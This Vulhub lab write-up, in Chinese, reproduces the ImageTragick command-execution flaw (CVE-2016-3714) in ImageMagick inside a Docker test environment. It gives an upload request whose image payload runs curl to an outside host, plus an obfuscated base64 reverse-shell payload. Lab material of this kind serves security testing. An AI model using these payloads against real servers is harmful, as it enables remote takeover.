Imagetragick 命令執行漏洞(CVE-2016–3714)
詳情見 https://imagetragick.com/ 和 https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html ,不再描述原理。
測試方法
一些測試使用的POC:https://github.com/ImageTragick/PoCs
編譯及啟動測試環境:
docker-compose build
docker-compose up -d
訪問http://your-ip/可見有三個文件:
├── demo.php # 使用vul.jpg+identify命令測試
├── upload.php # 支持用戶進行上傳,并將上傳的文件傳入PHP的imagick擴展,觸發漏洞
└── vul.jpg # 一個簡單的POC
首先訪問http://your-ip/demo.php,命令并沒有回顯,但在docker容器中,已經成功得到/tmp/success文件:

再訪問http://your-ip/upload.php測試,上傳POC文件,數據包如下(注意,我換了一個POC):
POST /upload.php HTTP/1.1
Host: your-ip
Content-Length: 321
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydGYwkOC91nnON1ws
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Connection: close
------WebKitFormBoundarydGYwkOC91nnON1ws
Content-Disposition: form-data; name="file_upload"; filename="vul.gif"
Content-Type: image/jpeg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|curl "www.leavesongs.com:8889)'
pop graphic-context
------WebKitFormBoundarydGYwkOC91nnON1ws--
可見,www.leavesongs.com:8889已經接收到http請求,說明curl命令執行成功:

反彈shell POC:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzQ1LjMyLjQzLjQ5Lzg4ODkgMD4mMQ== | base64 -d | bash`"||id " )'
pop graphic-context

Vulhub 文檔